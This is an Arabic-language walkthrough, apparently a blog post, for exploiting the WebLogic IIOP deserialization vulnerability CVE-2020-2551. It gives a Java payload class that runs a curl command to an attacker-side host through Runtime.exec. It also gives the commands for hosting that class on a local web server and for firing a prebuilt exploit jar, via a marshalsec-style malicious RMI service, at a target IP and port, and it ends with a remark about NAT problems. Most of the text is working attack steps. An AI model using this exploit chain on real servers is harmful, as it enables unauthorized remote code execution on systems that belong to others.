
Weblogic IIOP CVE-2020-2551
إلغاء تسلسل IIOP في Weblogic
Weblogic10.3.6+jdk1.6
الحزمة الجاهزة jar كود الاستخراج: a6ob
قم بتنزيل حزمة jar، ثم استخدم marshalsec لبدء خدمة RMI خبيثة، وقم بتجميع exp.java محليًا.
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
حاول استخدام نفس إصدار JDK ومكتبات التبعية (wlfullclient.jar) المستخدمة في Weblogic للترجمة ثم قم بتشغيل خادم ويب محليًا.
python -m http.server --bind 0.0.0.0 80
تشغيل حزمة jar عبر سطر الأوامر
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
الصورة الفعلية

يقول العديد من الزملاء أن إعادة الاستغلال لم تنجح، وبعد الاطلاع على بعض المقالات على الإنترنت، تبين أن IIOP يعاني من مشكلة وضع NAT. اليوم اكتشفت أن هناك مقالًا على Xianzhi: https://xz.aliyun.com/t/7498، فيمكنكم متابعة الاطلاع بأنفسكم.